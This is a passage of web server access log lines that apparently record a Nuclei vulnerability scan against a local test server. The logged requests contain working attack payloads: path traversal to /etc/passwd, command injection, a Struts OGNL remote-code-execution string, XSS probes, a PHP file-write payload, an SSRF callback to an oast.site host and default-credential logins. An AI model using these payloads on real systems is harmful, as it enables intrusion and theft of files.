"http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/cam_portal.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.save HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET .//WEB-INF/weblogic.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cblr/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webapp/?fccc%27\x5C%22%3E%3Csvg/onload=alert(xss)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/QueryComponent!Default.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"wsecure_action=update&publish=\x22;} header(\x22Nuclei: CVE-2016-10960\x22); class WSecureConfig2 {var $test=\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /comm.php?id=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\x22onmouseover=alert(document.domain)/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/airflow/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/nobody/Machine.cgi?action=get_capability HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /wlmeng/../../../../../../../../../../../etc/passwd%00index.htm HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/main.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"{\x0D\x0A \x22token\x22: {\x0D\x0A \x22$func\x22: \x22var_dump\x22\x0D\x0A }\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/newpassword HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET .//WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hsqldb%0a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.swp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/snapshots/:key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/menu/latest/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hui/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account/register HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graph HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://ca281d8smpvb9r2g07h03a4dq6uuhtuqg.oast.site%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%2229K9NJ2QTco8d1NEbeOuWcAzA74.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?login=lutron&password=lutron HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/weathermap/configs/poc.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/main.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/deployment.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22arlpass\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/sls/auth HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"{\x22sheet\x22:[\x22.es(*)\x22],\x22time\x22:{\x22from\x22:\x22now-1m\x22,\x22to\x22:\x22now\x22,\x22mode\x22:\x22quick\x22,\x22interval\x22:\x22auto\x22,\x22timezone\x22:\x22Asia/Shanghai\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/timelion/run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"command=create%20cli%20alias%20private%20list%20command%20bash","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=/install/index/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download.php?file=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /downloadfile.php?file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"Password=29K9NGv7IgwhLVwdXPDW9GhTwyZ&ConfirmPassword=29K9NGv7IgwhLVwdXPDW9GhTwyZ&RememberMe=true&__RequestVerificationToken={{csrf}}&RememberMe=false","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /account/register HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/account/register", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/logout?continue=//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29K9NJ2QTco8d1NEbeOuWcAzA74.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/123contactform-for-wordpress/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/sso/v2/sso/jwt?error_url=http://evil.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/workspace.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/build.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LTX_navi.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; 